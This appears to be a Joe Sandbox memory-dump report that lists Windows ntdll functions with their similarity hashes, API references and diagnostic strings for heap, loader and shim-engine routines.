Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd45c0c105a5826c87ad0a68625b3c48a2565e4a165f2a15b51f331ae9a52bef
Instruction ID: 8daf654a1868a0ed3370e7b5d6febdaede4a9c6f27e4236ffdcb6081d20612d9
Opcode Fuzzy Hash: bd45c0c105a5826c87ad0a68625b3c48a2565e4a165f2a15b51f331ae9a52bef
Instruction Fuzzy Hash: FF90023220380402D1047158481570B016547D0312F99C052A11A8555D8A2599557571

Function 35522FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c165a18cd4e53549f9956e52957e44c5f73056d1df2ee00707f7abcbbe920d6
Instruction ID: 7f80b63d0698c77907cf96a2de958db76f94edea207dedbd607ae90881eb2e30
Opcode Fuzzy Hash: 2c165a18cd4e53549f9956e52957e44c5f73056d1df2ee00707f7abcbbe920d6
Instruction Fuzzy Hash: 2690022260340042414471688845A0641656BE1221799C162A09DC550D895999696665

Function 35522FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b23415efda0be676c5e76e02410b87cbcb9437b156feba6951100c4235e8f08a
Instruction ID: ebad5aa3ece2f7eb0c94af93a1f72c48e96689c6f5471975db5aa00f2e93713f
Opcode Fuzzy Hash: b23415efda0be676c5e76e02410b87cbcb9437b156feba6951100c4235e8f08a
Instruction Fuzzy Hash: 4190023220380402D10471584809747016547D0312F99C052A51A8555E8A65D9957531

Function 35522E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3d09e320ac706378549522f490069623d2a530c0fa2546139c7d821ec2b5e0a
Instruction ID: 6787897aa428e3593ed17c3676e4d4eb9c97e2d15798131e743b2f42c5b5f997
Opcode Fuzzy Hash: d3d09e320ac706378549522f490069623d2a530c0fa2546139c7d821ec2b5e0a
Instruction Fuzzy Hash: 4A90022230340402D10671584415706016987D1355FD9C053E1468555D8A259A57B132

Function 35522EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfee3b46f3da60e0f62e5247599f385c7a3c8b2511df48a21df2cbbb7244582c
Instruction ID: cdb26a3b2159ef4d46217e8289fb10d4efe1c432bc069fc3c104121c60bdabdc
Opcode Fuzzy Hash: dfee3b46f3da60e0f62e5247599f385c7a3c8b2511df48a21df2cbbb7244582c
Instruction Fuzzy Hash: 8D90026220380403D14475584805707016547D0312F99C052A20A8555E8E299D557135

Function 35522E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2511bc4970c01ce017514056e4442e9e86e099f1bc8f8c1d8850f2a6c778290f
Instruction ID: 14ad1d427fca12a03ccc9605bd78b70d453f86b4655c1b29a9a2324a245be9cd
Opcode Fuzzy Hash: 2511bc4970c01ce017514056e4442e9e86e099f1bc8f8c1d8850f2a6c778290f
Instruction Fuzzy Hash: C690022260340502D10571584405716016A47D0251FD9C063A1068555ECE259A96B131

Function 35522EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6c60ffc611c2052a02ece6e1f37b9918859a4a4eb69c865c98a27d2e96cbbe
Instruction ID: 07289da2836f5ec35bca653590b7ecd7806cdb255a5cb64095d0c8f5da6fd083
Opcode Fuzzy Hash: 5d6c60ffc611c2052a02ece6e1f37b9918859a4a4eb69c865c98a27d2e96cbbe
Instruction Fuzzy Hash: 9E90027220340402D14471584405746016547D0311F99C052A50A8554E8A599ED97665

Function 35522C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 540404d249ab139e948581da6722cb2c827922334fb4b54a34c894224d438567
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 355BA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 355BA6DD
RtlDebugPrintTimes.NTDLL ref: 355BA771
RtlDebugPrintTimes.NTDLL ref: 355BA794
RtlDebugPrintTimes.NTDLL ref: 355BA7C0
RtlDebugPrintTimes.NTDLL ref: 355BA895
RtlDebugPrintTimes.NTDLL ref: 355BA8E8
RtlDebugPrintTimes.NTDLL ref: 355BA907
RtlDebugPrintTimes.NTDLL ref: 355BA938

Strings

HEAP: , xrefs: 355BA686

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: a53fdd9a9b6e8a0b9e7318fcf5e4552cd5b163ac8c34472cb06bee4d3e2cc25e
Instruction ID: 472ab214b94b78412660312f2386754cff00b01c0345ff7682bcd11251112edb
Opcode Fuzzy Hash: a53fdd9a9b6e8a0b9e7318fcf5e4552cd5b163ac8c34472cb06bee4d3e2cc25e
Instruction Fuzzy Hash: D5A15B75A183118FDB05CE28C898A1ABBE6BB88350F15496DFD45DB350EBB0EC46CB91

Function 35517630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 35554655
Execute=1, xrefs: 35554713
CLIENT(ntdll): Processing section info %ws..., xrefs: 35554787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 35554742
ExecuteOptions, xrefs: 355546A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 355546FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 35554725

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 0b348b1aba2cecfa7d08f295c8329edfb90fef81305c766a884c665775c8995d
Instruction ID: b4baba8c9ceed480736c558a160863210bf16310431776203f01a4ee7dd5892a
Opcode Fuzzy Hash: 0b348b1aba2cecfa7d08f295c8329edfb90fef81305c766a884c665775c8995d
Instruction Fuzzy Hash: A1510675A10259BAFF10DAA9DC85FAE7BB8BF44354F8004D9E906A7180EB70BB458F50

Function 354FA250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 355479FA
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 35547AE6
Actx , xrefs: 35547A0C, 35547A73
RtlpFindActivationContextSection_CheckParameters, xrefs: 355479D0, 355479F5
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 355479D5
SsHd, xrefs: 354FA3E4

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 3d204573b49c7a3540d0fba75dc0919dee56b388d9b3ba6e89bdb1c1ef72f092
Instruction ID: 84e4ca7646c5c62b8898dd4882355b9cda75991e1726698a652a28c8557524a9
Opcode Fuzzy Hash: 3d204573b49c7a3540d0fba75dc0919dee56b388d9b3ba6e89bdb1c1ef72f092
Instruction Fuzzy Hash: 02E1D6B46083018FE718CE2AC884B1AB7E1BF84754F544A6DFC95CB790DB72E946CB91

Function 3555FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3555FE73
RtlDebugPrintTimes.NTDLL ref: 3555FE95

Strings

Unknown, xrefs: 3555FDC2, 3555FDD4
minkernel\ntdll\ldrdload.c, xrefs: 3555FDE8
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 3555FDD8
$, xrefs: 3555FE3D
LdrpRedirectDelayloadFailure, xrefs: 3555FDDE

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: fee7e366aaeac053fa210482b0fec8c7b445f778c1a52b4751a82ac6a672fdd5
Instruction ID: 12a41ee5475a958bb1b747d6d86e837390060974b2947c940f3aeb426af595d9
Opcode Fuzzy Hash: fee7e366aaeac053fa210482b0fec8c7b445f778c1a52b4751a82ac6a672fdd5
Instruction Fuzzy Hash: 96417FB9E01209ABDB01DF95D980ADEBBB5FF88324F10056AED06F7351D771AA11CB90

Function 3558FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3558FDAE

Strings

HEAP: , xrefs: 3558FE79, 3558FF64
HEAP[%wZ]: , xrefs: 3558FE6C, 3558FF57
RtlFreeHeap, xrefs: 3558FDC8, 3558FE32
About to free block at %p with tag %ws, xrefs: 3558FF7E
About to free block at %p, xrefs: 3558FE8A

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: fec535977adc3cbc1e56d881b3d99eb6a2b11fbe609ef9f145dbab47a16456b2
Instruction ID: f3f02a423c1838cc9350e8485c08796a8c8013b78d5aebc1ff7708a91c5ab229
Opcode Fuzzy Hash: fec535977adc3cbc1e56d881b3d99eb6a2b11fbe609ef9f145dbab47a16456b2
Instruction Fuzzy Hash: 3C71DE36A14284DFDB09CFA8D450AADFBF2FF49314F44809AE445AB252DB75A981CB90

Function 354D65B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354D6664
RtlDebugPrintTimes.NTDLL ref: 354D66AF

Strings

Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35539AB4
minkernel\ntdll\ldrinit.c, xrefs: 35539AC5, 35539B06
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35539AF6
LdrpLoadShimEngine, xrefs: 35539ABB, 35539AFC

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: d983c7e442bf88dceed2a61253114468afe5d42483890f53d1f38bdf968c684f
Instruction ID: b1a855e7e64ddf9fe1978494ca1cab3cdd78a5ef2a0ad5cd6fa500ffc184e4ae
Opcode Fuzzy Hash: d983c7e442bf88dceed2a61253114468afe5d42483890f53d1f38bdf968c684f
Instruction Fuzzy Hash: B051F076B113589BDB08EBA8C864B9DB7F2BB80354F41015AE445BF296CB60BC42CB90

Function 3558F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3558F250
RtlDebugPrintTimes.NTDLL ref: 3558F2C5

Strings

HEAP: , xrefs: 3558F15D
---------------------------------------, xrefs: 3558F279
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3558F263
Entry Heap Size , xrefs: 3558F26D

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: d01babfc32bf2a76d8196d2f2ab7a199b2eb089c974f7552cbe05401f462c236
Instruction ID: e9391495013d08308c8703981c57492a0998f5de5cd4c0dae5d2a59737768514
Opcode Fuzzy Hash: d01babfc32bf2a76d8196d2f2ab7a199b2eb089c974f7552cbe05401f462c236
Instruction Fuzzy Hash: 9841583AB10216DFC708DF58D884959BBF6FF4936571581AAE409EB211DB71BC02CB90

Function 3552B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 3552B6BF

Strings

0, xrefs: 3552B695
-, xrefs: 3552B650
0, xrefs: 3552B66F
+, xrefs: 3552B65A

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 80200b2f4ac9984d2ac7f996cf7e49536b17acbc98f85db570490ca10df73a4f
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 9B81E578E092498EEF04CF64C8917EEBBB2BF45370F588619D8A5A76D1CB34B840CB50

Function 354E9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 35542559

Strings

$, xrefs: 354E9191
@, xrefs: 354E9175

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 3901021ccccb5d1f7b9e0cb4758cc94057e9946fa85cd37727794d052b34761c
Instruction ID: 8a545e31db4ea7cd22dab843a13c949715793ef9979da967201bcb28651eb258
Opcode Fuzzy Hash: 3901021ccccb5d1f7b9e0cb4758cc94057e9946fa85cd37727794d052b34761c
Instruction Fuzzy Hash: 0F811BB6D042699BDB25CF54CC44BDEB7B4AF48750F4041EAE919B7280E770AE85CFA0

Function 35514D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 35514D64

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 35553640, 3555366C
LdrpFindDllActivationContext, xrefs: 35553636, 35553662
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3555362F
Querying the active activation context failed with status 0x%08lx, xrefs: 3555365C

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: ca541a72a811307e4f70c973830f02ca5a8931247e8583e29a27544591e78f43
Instruction ID: 4bc0d2152cc965dfeacec4982440fd40f937d2afdafe0d1d5d097bdc3e65ff2e
Opcode Fuzzy Hash: ca541a72a811307e4f70c973830f02ca5a8931247e8583e29a27544591e78f43
Instruction Fuzzy Hash: 7E314D76904351EAFF11EB44D884F166BB4BB013E7F43646BEC0967150EBA0BF8086D5

Function 354DF910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3553E790

Strings

HEAP: , xrefs: 3553E70E
HEAP[%wZ]: , xrefs: 3553E701
(HeapHandle != NULL), xrefs: 3553E719

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: d397b7c058274a941d33497136cb8937b4d53f86b905e835c88e4805587fb146
Instruction ID: 00acb7430498ce1dd19e7de608192df9635abe19fd28b19cd578ae05793f4eb2
Opcode Fuzzy Hash: d397b7c058274a941d33497136cb8937b4d53f86b905e835c88e4805587fb146
Instruction Fuzzy Hash: E591E175B15741EFE72ACB24C8A5B6AF7E5BF84740F000499E8459B382DB78F841CB92

Function 3551BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 35557B8E
RTL: Re-Waiting, xrefs: 35557BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 35557B7F

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 347345ac2108ded35a7ac8effeb79e72f4f96982a2f735e527196f4fc74701db
Instruction ID: 9418081beb7d5fefdfaf00e29701a800426ac0378cd2bde71c88baebaec05e88
Opcode Fuzzy Hash: 347345ac2108ded35a7ac8effeb79e72f4f96982a2f735e527196f4fc74701db
Instruction Fuzzy Hash: 2B418E397057029FEB14CE25C840B5ABBE5FF88760F500A1EE95ADB680EB71F505CB91

Function 3551B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3555728C

Strings

RTL: Resource at %p, xrefs: 355572A3
RTL: Re-Waiting, xrefs: 355572C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 35557294

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 4d1cba2a66f91515b417c560cc7ef02c48f81d86f6c0584e06466cebb5eb6dc6
Instruction ID: b41cb1ed9105f2a04eeda99d08f7a2d46f2542c6854be94c17cffb503089099b
Opcode Fuzzy Hash: 4d1cba2a66f91515b417c560cc7ef02c48f81d86f6c0584e06466cebb5eb6dc6
